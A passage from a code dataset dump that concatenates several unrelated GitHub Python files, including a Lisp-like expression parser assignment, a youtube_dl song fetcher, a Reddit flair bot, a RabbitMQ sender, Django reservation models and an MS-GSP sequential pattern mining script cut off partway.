plt\n\n","repo_name":"DanielOrtegaCar/DataScience1","sub_path":"5-Regression/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"30376345574","text":"# Laryssa Revelli\n# A01979841\nfrom random import random, randint\n### TODO ##### \n# 1) False, True print 1\n# 2) KeyError: '>' in createParseTree line 147\nimport os\nPATH = \"C:/Users/lreesa/cs4700/Assn5n6/\"\nif not os.path.exists(PATH):\n os.makedirs(PATH)\n\n########## 1) BNF Grammar ############################################################\n# := | \n# | '(' 'if' ')'\n# ::= 'True' | 'False' | '(' 'not' ')'\n# | '(' ')'\n# | '(' '>' ')'\n# | '(' 'eq' ')'\n# ::= | '(' ')' \n\n# := '+' | '-' | '*' | '/'\n# := 'and' | 'or' # 'not' is accounted for in booleanExpression\n#######################################################################################\n \n# define all the possible operators and how many arguments they take\n# for extended language\nOperatorsAll = ['+', '-', '*', '/', 'if', 'and', 'or', 'not', '>', 'eq' ]\nOperatorsBoolBool = ['and', 'or', 'not', 'eq']\nOperatorsBoolNumb = ['>', 'eq']\nOperatorsNumb = ['+', '-', '*', '/']\nNumberOfArguments = {}\nArgumentCount = [(1, ['not']),(2, ['+', '-', '*', '/', 'and', 'or', 'eq']), (3, ['if'])]\n# # fill the mapping from operator to argument count\nfor (count, operators) in ArgumentCount:\n for op in operators:\n NumberOfArguments[op] = count\n \ndef processAllGood ():\n # Generate a set of correct random test problems\n with open(PATH + 'correctSyntax.txt', 'r') as file: # Use file to refer to the file object\n programs = file.readlines()\n for i in range(0, len(programs)):\n parse(programs[i])\n print(\"Index = %d \\n\" % i)\n\ndef generateRandomProgram(maxDepth = 10):\n # generates a string that is a legal sentence in the grammar of our L language\n if random() < 0.1 or maxDepth < 0:\n return str(randint(0, 100))\n elif random() < 0.3:\n return generateRandomExpressionBool(maxDepth - 1)\n elif random() < 0.3:\n return generateRandomExpressionNumb(maxDepth - 1)\n else:\n return \"(if %s %s %s)\" % (generateRandomExpressionBool(maxDepth - 1), \n generateRandomProgram(maxDepth - 1), \n generateRandomProgram(maxDepth - 1))\n 
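# e.g. legal sentences in the grammar at the top of this file include:\n#   42\n#   (+ 3 (* 4 5))\n#   (if (> 3 1) 10 (- 7 2))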
\ndef generateRandomExpressionNumb(maxDepth):\n if random() < 0.1 or maxDepth < 0:\n return str(randint(0, 100))\n return \"(%s %s %s)\" % (OperatorsNumb[randint(0,len(OperatorsNumb)-1)],\n generateRandomExpressionNumb(maxDepth-1),\n generateRandomExpressionNumb(maxDepth-1))\n \ndef generateRandomExpressionBool(maxDepth):\n if random() < 0.1 or maxDepth < 0:\n return ['True', 'False'][randint(0,1)]\n elif random() < 0.5:\n operator = OperatorsBoolBool[randint(0, len(OperatorsBoolBool)-1)]\n if NumberOfArguments[operator] == 1:\n return \"(%s %s)\" % (operator, \n generateRandomExpressionBool(maxDepth - 1))\n if NumberOfArguments[operator] == 2:\n return \"(%s %s %s)\" % (operator, \n generateRandomExpressionBool(maxDepth - 1),\n generateRandomExpressionBool(maxDepth - 1))\n else:\n operator = OperatorsBoolNumb[randint(0, len(OperatorsBoolNumb)-1)]\n return \"(%s %s %s)\" % (operator,\n generateRandomExpressionNumb(maxDepth - 1),\n generateRandomExpressionNumb(maxDepth - 1))\n \ndef genGood ():\n # Generate a set of correct random test problems\n with open(PATH + 'correctSyntax.txt', 'w') as file: # Use file to refer to the file object\n for _ in range(0, 1000):\n file.write(generateRandomExpressionNumb(1 + randint(0,10)) + \"\\n\")\n \ndef genBad ():\n with open(PATH + 'errorSyntax.txt', 'w') as file: # Use file to refer to the file object\n for _ in range(0, 1000):\n program = generateBadRandomExpression(1 + randint(0,10)) #(1 + randint(0,10))\n try: #try to parse the expression\n parse(program)\n # Only if it does not parse then we save\n except Exception as error:\n file.write(program + \"\\n\")\n \nBadOps = ['_', '=','(','%']\nBadNumbers = ['1.2344','x','y']\ndef generateBadRandomExpression(maxDepth = 10):\n # generates a string that is a legal sentence in the grammar of our simple lisp language\n if random() < 0.1 or maxDepth < 0:\n return str(randint(0, 100))\n if random() < 0.05 or maxDepth < 0:\n return str(BadNumbers[randint(0, len(BadNumbers)-1)])\n elif random() < 0.05:\n return \"(%s %s %s\" % (OperatorsAll[randint(0, 9)], \n generateBadRandomExpression(maxDepth - 1), \n generateBadRandomExpression(maxDepth - 1))\n elif random() < 0.05:\n return \"%s %s %s)\" % (OperatorsAll[randint(0, 9)], \n generateBadRandomExpression(maxDepth - 1), \n generateBadRandomExpression(maxDepth - 1))\n else:\n return \"(%s %s %s)\" % (OperatorsAll[randint(0, 9)], \n generateBadRandomExpression(maxDepth - 1), \n generateBadRandomExpression(maxDepth - 1))\n\n# 2) Extend your parser to handle all the above additional language constructs. 
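\n#    (i.e. the booleans, 'if', comparison and logical operators listed in the BNF grammar above)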
\n# This will involve adding new terminals (atoms) to the lexical analyzer, \n# extending the cases that the parser can handle, and extending the pretty printer \n# (extend the one that works with parse trees)\ndef atom(token):\n # changes a token to an actual integer or boolean\n if token.isdigit():\n return int(token)\n if token == 'True' or token == 'False':\n return bool(token) \n return token\n\n### takes a program string and returns a parse tree\ndef parse(programStr):\n # returns the input string as a parse tree, represented as either an int or a list of expressions\n return createParseTree(tokenize(programStr))\n \n### does error checking\ndef parseX(programStr):\n # returns the input string as a parse tree, represented as either an int or a list of expressions\n return createParseTreeX(tokenize(programStr))\n\ndef createParseTree(tokenList):\n token = tokenList.pop(0)\n if isinstance(token, int) or isinstance(token, bool):\n return token\n operator = tokenList.pop(0) \n parseTree = [operator]\n for i in range(NumberOfArguments[operator]):\n parseTree += [createParseTree(tokenList)]\n tokenList.pop(0) # pop the ')'\n return parseTree\n \ndef createParseTreeX(tokenList):\n if tokenList == []:\n raise Exception(\"Run out of tokens\")\n token = tokenList.pop(0)\n if isinstance(token, int) or isinstance(token, bool):\n return tokenList\n if not token == \"(\":\n raise Exception(\"Found %s instead of (\" % (token,))\n if tokenList == []:\n raise Exception(\"Missing Operator\")\n operator = tokenList.pop(0) \n if not operator in OperatorsAll:\n raise Exception(\"Unknown operator %s\" % operator)\n parseTree = [operator]\n for i in range(NumberOfArguments[operator]):\n parseTree += [createParseTree(tokenList)]\n if tokenList == []:\n raise Exception(\"Missing )\")\n close = tokenList.pop(0) # pop the ')'\n if not ')' == close: # pop the ')'\n raise Exception(\"Found %s instead of )\" % (close,))\n return parseTree\n \n ### prettyPrint an expression (parsed list of tokens)\n\n# takes a parse tree and prints it out so it is easier to read (maybe)\ndef prettyPrintExp(expression, depth = 0):\n if isinstance(expression, int):\n print(\"%s %d\" % (' ' * depth, expression))\n # elif isinstance(expression, bool):\n # print(\"%s %s\" % (' ' * depth, expression))\n else:\n print(\"%s(%s \" % (' ' * depth, expression[0]))\n for i in range(1, NumberOfArguments[expression[0]]+1):\n prettyPrintExp(expression[i], depth+2)\n print(\"%s) \" % (' ' * (depth+1)))\n \n### very simple code that just checks whether the number of open parentheses\n### is the same as the number of closed parentheses\ndef checkBalanced(tokenList):\n depth = 0\n while not tokenList == []:\n token = tokenList.pop(0)\n if token == '(': #consume and add 1 to depth\n depth = depth + 1\n if token == ')':\n depth = depth - 1\n return depth == 0\n \n### takes a string representing an expression in simple lisp and returns a list of tokens\ndef tokenize(programStr):\n tokens = programStr.replace('(', ' ( ').replace(')', ' ) ').split()\n if all(legalToken(token) for token in tokens):\n return [atom(token) for token in tokens]\n else:\n badTokens = str([token for token in tokens if not legalToken(token)])[1:][:-1]\n raise Exception(\"Unknown token found %s\" % (badTokens,))\n \n### returns True if the token is legal \ndef legalToken(token):\n # returns True if legal for our simple lisp\n return (token.isdigit() or token == 'True' or token == 'False'\n or token in OperatorsAll + [')', '('])\n\n# Reads file are parses, prints to error or 
prettyprintcorrect\ndef readFile(fileName):\n fil = open(PATH + fileName)\n fileLines = fil.readlines()\n for f in fileLines:\n parseTree = parseX(f)\n if None not in parseTree:\n prettyPrint(parseTree, f)\n else:\n errorPrint(parseTree, f)\n\n# Prints exceptions to error.txt\ndef errorPrint(expression, depth):\n # takes a tokenized string expression and prints it out based on depth\n token = expression.pop(0) \n\n# # 3) run your parser over the two attached files, one containing \n# valid expressions, the other expressions with syntax errors. \n\n# readFile('correctSyntax.txt')\nprg = generateRandomProgram(2) \nprint(prg)\nprettyPrintExp(parse(prg)) \n ","repo_name":"lreesa/cs4700-Programming-languages","sub_path":"Assn5n6/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29684057938","text":"import random\n\n\nnum1 = random.randint(1, 100)\nnum2 = random.randint(1, 100)\n\n\nrules_game = 'Find the greatest common divisor of given numbers.'\nexample = f'{num1} {num2}'\n\n\ndef truth(num1, num2):\n while num1 != num2:\n if num1 > num2:\n num1 -= num2\n else:\n num2 -= num1\n return num1\n\n\nright_answer = str(truth(num1, num2))\ntext1 = f\" is wrong answer ;(. Correct answer was '{right_answer}'.\"\ntext2 = \"Let's try again, \"\n","repo_name":"Dmitri-Bes/python-project-49","sub_path":"brain_games/games/gcd.py","file_name":"gcd.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42797525485","text":"import youtube_dl\nimport asyncio\nyoutube_dl.utils.bug_reports_message = lambda: '' #Suppressing Noise Console From YT_Dl\nclass Song:\n def __init__(self,url,track,artist,YTurl):\n self.track=track\n self.url=url\n self.artist=artist\n self.YTurl=YTurl\n def __str__(self):\n return 'Track: {}, Download URL: {} \\n Artist: {}, URL: {}'.format(self.track,self.url[:5],self.artist,self.YTurl)\nclass YT:\n @staticmethod\n def InsertData(data: list,DataBase,guildID: int,url: str):\n if 'entries' in data:\n for i in data['entries']:\n if(not i.get('url',False)):continue\n DataBase.insert(guildID,i.get('track',i.get('title','Unknown')),i.get('artist'),i.get('url'),i.get('webpage_url',url))\n else:\n DataBase.insert(guildID,data.get('track',data.get('title','Unknown')),data.get('artist'),data.get('url'),data.get('webpage_url',url))\n @staticmethod\n async def grab(url: str,DataBase,guildID: int,opts: dict,loop=None):\n client=youtube_dl.YoutubeDL(opts)\n if(not loop):loop=asyncio.get_event_loop()\n try:\n data=await loop.run_in_executor(None,lambda: client.extract_info(url,download=False))\n except:\n return False\n YT.InsertData(data,DataBase,guildID,url)\n if(len(data)==0):\n return None\n if 'entries' in data:\n return len(data.get('entries'))\n return 1\nif __name__=='__main__':\n print('nothing')","repo_name":"GamesBond008/DiscordBotRewrite","sub_path":"Tools/Songs.py","file_name":"Songs.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"40615461999","text":"#!/usr/bin/env python\n\nimport sys\nimport csv\n\n# if using spikein normalization, set control to 10M reads and condition to 10M*(condition SI pct)/(control SI pct)\ndef danpos_norm(norm, condition, control, condition_samples, control_samples, si_table):\n if norm==\"spikenorm\":\n cond_count, 
ctrl_count, cond_val, ctrl_val = 0,0,0,0\n with open(si_table) as si_table:\n si_table = csv.reader(si_table, delimiter=\"\\t\")\n for row in si_table:\n if row[0] in condition_samples.split(\",\"):\n cond_val += float(row[4])/float(row[2])\n cond_count += 1\n if row[0] in control_samples.split(\",\"):\n ctrl_val += float(row[4])/float(row[2])\n ctrl_count += 1\n cond_sipct = cond_val/cond_count\n ctrl_sipct = ctrl_val/ctrl_count\n spikein_counts = int(1e7*ctrl_sipct*(1-cond_sipct)/((1-ctrl_sipct)*cond_sipct))\n spikein_string = \"--count nucleosome_quantification/data/{condition}/:{spikein_counts},nucleosome_quantification/data/{control}/:1e7\".format(condition=condition, spikein_counts=spikein_counts, control=control)\n return spikein_string\n else:\n return \"\"\n\nprint(danpos_norm(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5], sys.argv[6]))\n\n","repo_name":"winston-lab/mnase-seq","sub_path":"scripts/danpos_norm.py","file_name":"danpos_norm.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"2329084736","text":"import RPi.GPIO as GPIO\nfrom mfrc522 import SimpleMFRC522\nimport consulta\nfrom datetime import datetime\n\nreader = SimpleMFRC522()\n\n#db = consulta.conexion()\n\n\ntry:\n while True:\n db = consulta.conexion()\n id, text = reader.read()\n print(id)\n print(type(id))\n print(text)\n print(type(text))\n hash_fecha = consulta.validacion(db,id,text)\n print(hash_fecha)\n print(type(hash_fecha))\n reader.write(hash_fecha)\n print(\"Written: \"+ hash_fecha)\n consulta.cerrar_conexion(db)\n\n \n \nfinally:\n GPIO.cleanup()\n","repo_name":"ElDracoUniversitario/TFG-SIMOVA-CORE","sub_path":"Código de ejemplo/Lectura.py","file_name":"Lectura.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19184452625","text":"#!/user/bin/env python3.6\n\n# Based on https://docs.python.org/3/howto/logging.html#logging-basic-tutorial\nimport logging\n\n# Set up logging\nlogging.basicConfig(filename='blaulicht_tracker.log',format='%(asctime)s %(levelname)s %(message)s',level=logging.DEBUG)\n\ndef add_to_log(text, level='debug'):\n \"\"\"\n Log text with level\n \"\"\"\n level = level.lower()\n if level == 'debug':\n logging.debug(text)\n elif level == 'info':\n logging.info(text)\n elif level == 'warning':\n logging.warning(text)\n elif level == 'error':\n logging.error(text)\n elif level == 'critical':\n logging.critical(text)\n else:\n logging.error(f'Trying to log \"{text}\", but no usable level was provided!')\n","repo_name":"tcmetzger/blaulicht-tracker","sub_path":"helpers/log_to_logfile.py","file_name":"log_to_logfile.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"37586734438","text":"#/u/GoldenSights\nimport traceback\nimport praw\nimport time\nimport datetime\n\n''' USER CONFIGURATION '''\n\nAPP_ID = \"\"\nAPP_SECRET = \"\"\nAPP_URI = \"\"\nAPP_REFRESH = \"\"\n# https://www.reddit.com/comments/3cm1p8/how_to_make_your_bot_use_oauth2/\nUSERASGENT = \"\"\n# This is a description of what your bot is doing. 
Include your username\n# and be complete\n\nSUBREDDIT = \"randomactsofcards\"\n# The subreddit on which to operate\n\nMINIMUM_AGE = 30 * 24 * 60 * 60\n# The number of SECONDS in age for the post to receive oldflair\n# The above multiplication is 30 days.\nOLDFLAIR_TEXT = \"Fulfilled\"\nOLDFLAIR_CSS_CLASS = \"fulfilled\"\n# The text and css class for the flair which you will assign\n\nOLDFLAIR_COMMENT = \"\"\"\nYour post is 30 days old, was it ever fulfilled?\n\nLine 2,\n\nLine 3, etc etc.\n\"\"\"\n# This comment will be left on the post when it is oldflaired\n# Make the quotes empty \"\" if you don't want to leave a comment\n\nBLACKLIST = [\"[Thank You]\", \"Fulfilled\", \"thanks\"]\n# This is a list of phrases that, if they are found in the flair\n# OR THE TITLE will cause the post to be skipped from the process\n# Letter casing does not matter\n\nWAIT = 120\n# The number of seconds between cycles.\n# The bot is completely inactive during this time\n\n''' All done! '''\n\n\n\ntry:\n\timport bot\n\tUSERAGENT = bot.aG\nexcept ImportError:\n\tpass\n\nprint('Logging in to reddit')\nr = praw.Reddit(USERAGENT)\nr.set_oauth_app_info(APP_ID, APP_SECRET, APP_URI)\nr.refresh_access_information(APP_REFRESH)\n\n\n\ndef oldflair():\n\tprint('Getting submissions for %s' % SUBREDDIT)\n\tsubreddit = r.get_subreddit(SUBREDDIT)\n\tsubmissions = subreddit.get_new(limit=1000)\n\tnowstamp = datetime.datetime.now(datetime.timezone.utc)\n\tnowstamp = nowstamp.timestamp()\n\n\tfor submission in submissions:\n\t\tsid = submission.id\n\t\ttimedif = nowstamp - submission.created_utc\n\t\tprint('Checking %s: ' % sid, end=\"\")\n\t\tif timedif > MINIMUM_AGE:\n\t\t\tsflair_text = submission.link_flair_text\n\t\t\tsflair_text = sflair_text.lower() if sflair_text else ''\n\t\t\tsflair_css = submission.link_flair_css_class\n\t\t\tsflair_css = sflair_css.lower() if sflair_css else ''\n\t\t\tstitle = submission.title.lower()\n\t\t\tchecks = [sflair_text, sflair_css, stitle]\n\t\t\tif sflair_text != OLDFLAIR_TEXT.lower() and sflair_css != OLDFLAIR_CSS_CLASS.lower():\n\t\t\t\tif not any(blacklist.lower() in checks for blacklist in BLACKLIST):\n\t\t\t\t\tprint()\n\t\t\t\t\tprint('\\tAssigning oldflair')\n\t\t\t\t\tsubmission.set_flair(flair_text=OLDFLAIR_TEXT, flair_css_class=OLDFLAIR_CSS_CLASS)\n\t\t\t\t\tif OLDFLAIR_COMMENT:\n\t\t\t\t\t\tprint('\\tWriting comment')\n\t\t\t\t\t\toldcomment = submission.add_comment(OLDFLAIR_COMMENT)\n\t\t\t\t\t\tprint('\\tDistinguishing comment')\n\t\t\t\t\t\toldcomment.distinguish()\n\t\t\t\telse:\n\t\t\t\t\tprint('Contains blacklisted phrase')\n\t\t\telse:\n\t\t\t\tprint('All good')\n\t\telse:\n\t\t\tremaining = MINIMUM_AGE - timedif\n\t\t\tprint('Too young. 
%s remain' % format_seconds_to_hhmmss(remaining))\n\ndef format_seconds_to_hhmmss(seconds):\n\t#Copied from Stack Overflow http://stackoverflow.com/a/1384506\n\thours = seconds // (60*60)\n\tseconds %= (60*60)\n\tminutes = seconds // 60\n\tseconds %= 60\n\treturn \"%02i:%02i:%02i\" % (hours, minutes, seconds)\n\nwhile True:\n\ttry:\n\t\toldflair()\n\texcept Exception:\n\t\ttraceback.print_exc()\n\t\tprint('Sleeping 20 additional seconds')\n\t\ttime.sleep(20)\n\tprint('Sleeping %d seconds' % WAIT)\n\ttime.sleep(WAIT)","repo_name":"voussoir/reddit","sub_path":"_old/Oldflair/oldflair.py","file_name":"oldflair.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":478,"dataset":"github-code","pt":"77"} +{"seq_id":"39771805304","text":"from easydict import EasyDict\n\n# ==============================================================\n# begin of the most frequently changed config specified by the user\n# ==============================================================\ncollector_env_num = 8\nn_episode = 8\nevaluator_env_num = 3\nnum_simulations = 25\nupdate_per_collect = 100\nbatch_size = 256\nmax_env_step = int(1e5)\nreanalyze_ratio = 0\n# ==============================================================\n# end of the most frequently changed config specified by the user\n# ==============================================================\n\ncartpole_muzero_config = dict(\n exp_name=f'data_mz_ctree/cartpole_muzero_ns{num_simulations}_upc{update_per_collect}_rr{reanalyze_ratio}_seed0',\n env=dict(\n env_name='CartPole-v0',\n continuous=False,\n manually_discretization=False,\n collector_env_num=collector_env_num,\n evaluator_env_num=evaluator_env_num,\n n_evaluator_episode=evaluator_env_num,\n manager=dict(shared_memory=False, ),\n ),\n policy=dict(\n model=dict(\n observation_shape=4,\n action_space_size=2,\n model_type='mlp', \n lstm_hidden_size=128,\n latent_state_dim=128,\n self_supervised_learning_loss=True, # NOTE: default is False.\n discrete_action_encoding_type='one_hot',\n norm_type='BN', \n ),\n cuda=True,\n env_type='not_board_games',\n game_segment_length=50,\n update_per_collect=update_per_collect,\n batch_size=batch_size,\n optim_type='Adam',\n lr_piecewise_constant_decay=False,\n learning_rate=0.003,\n ssl_loss_weight=2, # NOTE: default is 0.\n num_simulations=num_simulations,\n reanalyze_ratio=reanalyze_ratio,\n n_episode=n_episode,\n eval_freq=int(2e2),\n replay_buffer_size=int(1e6), # the size/capacity of replay_buffer, in the terms of transitions.\n collector_env_num=collector_env_num,\n evaluator_env_num=evaluator_env_num,\n ),\n)\n\ncartpole_muzero_config = EasyDict(cartpole_muzero_config)\nmain_config = cartpole_muzero_config\n\ncartpole_muzero_create_config = dict(\n env=dict(\n type='cartpole_lightzero',\n import_names=['zoo.classic_control.cartpole.envs.cartpole_lightzero_env'],\n ),\n env_manager=dict(type='subprocess'),\n policy=dict(\n type='muzero',\n import_names=['lzero.policy.muzero'],\n ),\n)\ncartpole_muzero_create_config = EasyDict(cartpole_muzero_create_config)\ncreate_config = cartpole_muzero_create_config","repo_name":"opendilab/LightZero","sub_path":"lzero/policy/tests/config/cartpole_muzero_config_for_test.py","file_name":"cartpole_muzero_config_for_test.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":618,"dataset":"github-code","pt":"77"} +{"seq_id":"37798776446","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom 
room.models import Room \n\nclass Reservation(models.Model):\n user = models.ForeignKey(User, related_name='reservations', on_delete=models.CASCADE)\n room = models.ForeignKey(Room, related_name='reservations', on_delete=models.CASCADE)\n is_active = models.BooleanField(default=True)\n created_by = models.ForeignKey(User, related_name='created_by', on_delete=models.CASCADE)\n updated_by = models.ForeignKey(User, related_name='updated_by', on_delete=models.CASCADE)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n def __str__(self) -> str:\n return f'Reg No: {self.user.profile.registration_no} - Name: {self.user.first_name} {self.user.last_name}'\n\nclass Payment(models.Model):\n reservation = models.ForeignKey(Reservation, related_name='payments', verbose_name='reservations', on_delete=models.CASCADE, null=True)\n amount = models.IntegerField(default=0)\n balance = models.IntegerField(default=0)\n created_at = models.DateTimeField(auto_now_add=True)\n\n def __str__(self) -> str:\n return f'{self.reservation}'\n","repo_name":"robmainah/simple_pojects","sub_path":"hostel/reservation/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74012810489","text":"a = []\nwith open('27_B.txt') as fin:\n n = int(fin.readline())\n for i in range(n):\n a.append(int(fin.readline()))\nmaxS = 0\nminLen = n\npresum = [0] * n # префиксные суммы\ns = 0 # текущая сумма\nlefts = [None] * 43\nrights = [None] * 43\nlefts[0] = -1\nfor i in range(n):\n s += a[i]\n presum[i] = s\n t = s % 43\n if lefts[t] == None:\n lefts[t] = i\n rights[t] = i\n\nfor i in range(43):\n if lefts[i]:\n s = presum[rights[i]] - presum[lefts[i]]\n if s > maxS or s == maxS and rights[i] - lefts[i] < minLen:\n maxS = s\n minLen = rights[i] - lefts[i]\nprint(minLen)","repo_name":"binom-edu/2021-ege","sub_path":"2022-04-25/b1.py","file_name":"b1.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41386071607","text":"from django.urls import path\r\nfrom base.views import users_views as views\r\n\r\n# from rest_framework_simplejwt.views import (\r\n# TokenObtainPairView,\r\n# TokenRefreshView,\r\n# )\r\n\r\nurlpatterns = [\r\n path('login/', views.MyTokenObtainPairView.as_view(), name='token_obtain_pair'),\r\n path('profile/' , views.getUserProfile , name = \"profile\"),\r\n path('profile/update/' , views.updateUserProfile , name = \"profile-update\"),\r\n \r\n path('' , views.getUsers , name = \"get_user\"),\r\n path('/' , views.getUserById , name = 'get-suer-by-id'),\r\n path('update/' , views.updateUser , name = 'update-user'),\r\n path('delete//' , views.deleteUser , name = \"delete-user\"),\r\n path('register/' , views.RegisterUser , name = \"register\"),\r\n \r\n]\r\n","repo_name":"punyapd/ecommerce","sub_path":"base/urls/users_urls.py","file_name":"users_urls.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25973310532","text":"#! 
/usr/bin/env python\n# -*- coding:utf-8 -*-\n\"\"\"\n@author : MG\n@Time : 2018/9/7 13:35\n@File : connection_test.py\n@contact : mmmaaaggg@163.com\n@desc : 参考 https://blog.csdn.net/dutsoft/article/details/71023775\n\"\"\"\n\nimport pika\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\nchannel = connection.channel()\nchannel.queue_declare(queue='hello')\nchannel.basic_publish(exchange='',\n routing_key='hello',\n body='Hello World!')\nprint(\" [x] Sent 'Hello World!'\")\nconnection.close()\n","repo_name":"mmmaaaggg/RefUtils","sub_path":"src/fh_tools/language_test/rabbitmq_test/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"37737667651","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1148]:\n\n\nimport copy\nfrom collections import defaultdict\ndef main():\n count=defaultdict(int)\n F=defaultdict(list)\n k=1\n d=\"data.txt\"\n p=\"para.txt\"\n S=Read_Data(d)\n MS,SDC=Read_Para(p)\n N=len(S)\n M=[] # according to MIS(i)’s stored in MS\n for i ,v in sorted(MS.items(),key=lambda kv:kv[1]):\n M.append(i)\n L,Count_L=Init_Pass(M,S,N,MS) #first pass over S\n F[k]=F1gen(L,MS,Count_L,count,N)\n printOutput(k, F[k], count)\n k=k+1\n while (F[k-1]):\n Candidates=[]\n if k==2:\n Candidates=Cand2Gen(L,Count_L,MS,SDC,N)\n else:\n Candidates=MSCandGen(F[k-1],Count_L,SDC,MS,N) # To be Written\n for t,s in S.items():\n for cand in Candidates:\n isSequence=isSubsequence(cand,s)\n if isSequence:\n count[str(cand)]+=1\n F[k]=GenFk(Candidates,MS,count,N)\n printOutput(k, F[k], count)\n k+=1 \n return\n\n\n# In[1149]:\n\n\ndef Read_Data(file):\n with open(file) as f:\n line=f.readline()\n cnt=0\n S=defaultdict(list)\n while line: \n sequence=[]\n cnt+=1\n line=line.replace(\">\",'').replace('<','').replace(\"}{\",\"_\").replace(\"{\",\"\").replace(\"}\",\"\")\n for i in line.split(\"_\"):\n element=[]\n for item in i.split(\",\"):\n element.append(int(item.strip(\" \\n\")))\n sequence.append(element)\n S[cnt]=sequence\n line=f.readline()\n return S\n\n\n# In[1150]:\n\n\ndef Read_Para(file):\n with open(file) as f:\n line=f.readline()\n MS=defaultdict()\n while line:\n if \"MIS\" in line:\n element=line[line.find(\"(\")+1:line.find(\")\")]\n mis=line[line.find(\"=\")+1:].lstrip(\" \").lstrip(\"\\n\")\n MS[int(element)]=float(mis)\n else:SDC=float(line[line.find(\"=\")+1:].lstrip(\" \"))\n line=f.readline()\n return MS,SDC\n \n\n\n# In[1151]:\n\n\n# Initial pass over transaction and counting the occurence of each item\n#this is eliminate any item that is below the lowest MIS\ndef Init_Pass(M,S,N,MS):\n Count=defaultdict(int)\n Count_L=defaultdict(int)\n L=[]\n for i,s in S.items():\n for item in M:\n if item in sum(s,[]):\n Count[item]+=1\n for item in M:\n if float(Count[item]/N) >= float(MS[item]):\n Minimum_MIS,i=float(MS[item]),M.index(item)\n break\n \n for index in range(i,len(M)):\n if float(Count[M[index]]/N) >= Minimum_MIS:\n L.append(M[index])\n Count_L[M[index]]=Count[M[index]]\n return L,Count_L\n\n\n# In[1152]:\n\n\ndef F1gen(L,MS,Count,count, N):\n F1=[]\n for item in L:\n #Item satisfying its own MIS\n if float(Count[item]/N)>=MS[item]:\n itemString= \"[\" + str(item) +\"]\"\n count[itemString] = Count[item]\n# print(\"item--->{0} count--->{1} ms--->{2}\".format(item,Count[item],MS[item]))\n F1.append([item])\n \n return F1\n\n\n# In[1153]:\n\n\ndef Cand2Gen(L,L_count,MS,sdc,n):\n def Duplicate_Removal(C2):\n #remove 
candidates with same element like [10,10] and candidates not in lexicographic order like [30,20]\n C2[:] = [c for c in C2 if type(c[0]) is int and c[0]= MS[elemt]):\n\n for next_elemt in L[L.index(elemt):]:\n\n if L_count[next_elemt] >= MS[elemt] and abs ( float(L_count[next_elemt]/n) - float(L_count[elemt]/n)) <= sdc:\n\n c2.append([elemt, next_elemt])\n\n c2.append([[elemt],[next_elemt]])\n\n for next_elemt in L[:L.index(elemt)]:\n\n if L_count[next_elemt] >= MS[elemt] and abs(float(L_count[next_elemt]/n) - float(L_count[elemt]/n)) <= sdc:\n\n c2.append([elemt, next_elemt])\n\n c2.append([[elemt],[next_elemt]])\n C2=Duplicate_Removal(c2)\n return C2\n\n\n# In[1154]:\n\n\ndef isSubsequence(c,s):\n #to handle cases like [10,20,30] convert it into [[10,20,30]]\n if type(c[0]) is int:\n c=[c] \n NumElement_C=len(c)\n flag=[0]*len(s)\n index=-1\n for element in c:\n for i in range(index+1,len(s)):\n if len(element)==len(set(element)):\n if set(element).issubset(set(s[i])) and not flag[i]:\n index=i\n flag[i]=1\n break\n if sum(flag)==NumElement_C:\n return True\n else:\n return False\n\n\n# In[1155]:\n\n\ndef GenFk(Candidates,MS,count,N):\n F=[]\n for cand in Candidates:\n if type(cand[0]) is list:\n temp=sum(cand,[])\n else:temp=copy.deepcopy(cand)\n min_mis=float('inf')\n for item in temp:\n min_mis=min(min_mis,MS[item])\n if float(count[str(cand)]/N)>=float(min_mis) :\n F.append(cand)\n return F\n\n\n# In[1156]:\n\n\ndef MSCandGen(F,Lcount,SDC,MS,N):\n convert=lambda s:sum(s,[]) if type(s[0]) is list else copy.deepcopy(s) # merges lists\n candlist=[]\n \n def CheckLastMIS(s2,MS):\n convert=lambda s2:sum(s2,[]) if type(s2[0]) is list else copy.deepcopy(s2) \n temp=convert(s2)\n min_mis=float('inf')\n last_item=temp[-1]\n if len(set(temp))==1:return False # for s=[[30],[30]]\n for item in temp:\n if MS[item]<=MS[last_item] and item!=last_item:\n return False\n return True\n \n def checkIfFirstMISIsSmallest(s, MS):\n convert=lambda s2:sum(s2,[]) if type(s2[0]) is list else copy.deepcopy(s2) \n temp=convert(s)\n min_mis=float('inf')\n first_item=temp[0]\n if len(set(temp))==1:return False\n for item in temp:\n if MS[item]<=MS[first_item] and item!=first_item:\n return False\n 